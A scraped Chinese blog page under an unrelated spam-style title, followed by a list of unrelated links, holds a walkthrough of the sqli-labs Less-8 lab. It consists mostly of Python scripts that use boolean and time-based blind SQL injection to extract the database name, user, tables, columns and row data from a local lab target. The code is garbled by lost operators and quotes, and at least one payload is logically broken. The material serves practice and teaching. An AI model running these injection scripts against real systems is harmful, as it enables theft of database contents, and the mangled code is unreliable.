当前位置: 首页 > news >正文

用商城系统做教育网站做企业官网需要多少钱

用商城系统做教育网站,做企业官网需要多少钱,网站设计专家,如何建网站看到物联网设备信息在sqli-labs中的第8题无回显可以尝试盲注的手法获取数据 发现页面加载了3秒左右可以进行盲注 布尔盲注数据库名 import requestsdef inject_database(url):datanamefor i in range(1,15):low 32high 128mid (low high) // 2while low high:path id1 and asci…在sqli-labs中的第8题无回显可以尝试盲注的手法获取数据 发现页面加载了3秒左右可以进行盲注 布尔盲注数据库名 import requestsdef inject_database(url):datanamefor i in range(1,15):low 32high 128mid (low high) // 2while low high:path id1 and ascii(substr(database(),%d, 1)) %d-- % (i,mid)r requests.get(url,path)if You are in........... in r.text:low mid 1else :high midmid (low high) // 2if mid 32:breakdataname chr(mid)print(dataname)if __name____main__:url http://127.0.0.1:8989/Less-8/inject_database(url) 结果 用时间盲注出用户名 import requests import timedef inject_user(url):userfor i in range(1,15):low 32high 128mid (low high) // 2while low high:payload f1 and if(ascii(substr(user(), {i}, 1)) {mid},sleep(1),0)-- res {id:payload}start_time time.time()r requests.get(url,paramsres)if (time.time() - start_time)1:# 匹配成功low mid 1else :high midmid (low high) // 2if mid 32:breakuser chr(mid)print(user)if __name____main__:url http://127.0.0.1:8989/Less-8/inject_user(url)结果 用盲注的方式查询表、列、具体数据 if __name__ __main__:url http://127.0.0.1:8989/Less-8/# 获取当前数据库名database_name inject_database(url)print(fDatabase name: {database_name})# 获取数据库中的表名tables inject_tables(url, database_name)print(fTables in database {database_name}: {tables})# 获取指定表中的列名table_name users # 替换为目标表名columns inject_columns(url, table_name)print(fColumns in table {table_name}: {columns})# 获取指定表中特定列的数据column_name username # 替换为目标列名data inject_data(url, table_name, column_name)print(fData in column {column_name} of table {table_name}: {data}) 时间检测模块 # 发送请求并检查响应时间 def check_time_injection(url, payload):res {id: payload}start_time time.time()r requests.get(url, paramsres)elapsed_time time.time() - start_timereturn elapsed_time 1 # 假设延迟超过1秒表示查询成功 数据库模块 # 获取当前数据库名 def inject_database(url):datanamefor i in range(1,15):low 32high 128mid (low high) // 2while low high:payload 1 and ascii(substr(database(),%d, 1)) %d-- % (i,mid)res {id:payload}r requests.get(url,paramsres)if You are in........... in r.text:low mid 1else :high midmid (low high) // 2if mid 32:breakdataname chr(mid)print(dataname)return dataname 数据库中表名模块 # 获取指定数据库中的表名 def inject_tables(url, database_name):tables []table_index 0while True:table_index 1table_name for i in range(1, 20): # 假设表名长度不超过20字符low 32high 128while low high:mid (low high) // 2payload f, and if(ascii(substr(select table_name from information_schema.tables where table_name{database_name} limit {table_index-1},1),{i},1 {mid},sleep(1),0)-- if check_time_injection(url, payload):low mid 1else:high midif low 32: # ASCII码32为空格通常表示结束breaktable_name chr(low)print(fCurrent table name: {table_name})if table_name:tables.append(table_name)print(fFound table: {table_name})else:breakreturn tables 列名模块 def inject_columns(url, table_name):columns []column_index 0while True:column_index 1column_name for i in range(1, 20): # 假设列名长度不超过20字符low 32high 128while low high:mid (low high) // 2payload f1 and if(ascii(substr((select column_name from information_schema.columns where table_name{table_name} limit {column_index-1},1),{i},1)) {mid},sleep(1),0) -- if check_time_injection(url, payload):low mid 1else:high midif low 32: # ASCII码32为空格通常表示结束breakcolumn_name chr(low)print(fCurrent column name: {column_name})if column_name:columns.append(column_name)print(fFound column: {column_name})else:breakreturn columns 指定查询数据模块 # 获取指定表中特定列的数据 def inject_data(url, table_name, column_name):data []row_index 0while True:row_index 1row_value for i in range(1, 20): # 假设数据长度不超过20字符low 32high 128while low high:mid (low high) // 2payload f1 and if(ascii(substr((select {column_name} from {table_name} limit {row_index-1},1),{i},1)) {mid},sleep(1),0) -- if check_time_injection(url, payload):low mid 1else:high midif low 32: # ASCII码32为空格通常表示结束breakrow_value chr(low)print(fCurrent row value: {row_value})if row_value:data.append(row_value)print(fFound data: {row_value})else:breakreturn data 结果 数据库 列 user
http://www.zqtcl.cn/news/116492/

相关文章:

  • 品牌网站建设预算网站制作过程内容
  • 石河子建设网站网站开发参考资料
  • 网站开发招标参数wordpress个性化友情链接页面
  • 建设企业网站有哪些wordpress进入中国市场
  • 大学社团网站建设虚拟主机如何做网站
  • 销售的产品是帮别人做网站电脑搭建网站
  • h5商城网站是什么莆田网站建设技术托管
  • 优惠券怎么做自己的网站英文网站怎么设计
  • 做网站怎么样才能排在首页做微网站的公司哪家好呢
  • 分析网站外链分析工具wordpress同步简书
  • 电子商务网站案例分析互动游戏制作软件
  • 网站做子域名做美团旅游网站多少钱
  • php做网站架构图开家做网站公司有哪些
  • 专门做ppt会员网站鄞州网站制作
  • 企业网站开发视频请简述网站建设流程图
  • 做网站 做手机app要学什么软件网站在哪里购买
  • 老罗做的网站赣州建设部网站
  • 四川建设主管部门网站盘搜搜
  • 创造网站的最简单 软件是哪个免费全自动推广平台
  • 如何看网站做的好坏vs2017做网站
  • 电子商务网站开发费用入账wordpress商城主题模板下载
  • 广西南宁公司网站制作百度推广自己做网站吗
  • 网站建设公司外链怎么做网站开发职业类别代码
  • 网站优化公司怎么选免费手机网站建设
  • 怎么建立自己的网站平台多少钱专用于做网站公司
  • 怎么修改网站后台权限商城网站制作 价格
  • 英铭广州网站建设wordpress服务器域名
  • 怎么做微商网站怎么生成网站源代码
  • 建设网站怎么设置网站页面大小外贸原单童装哪个网站做
  • 网站布局设计软件太原专业做网站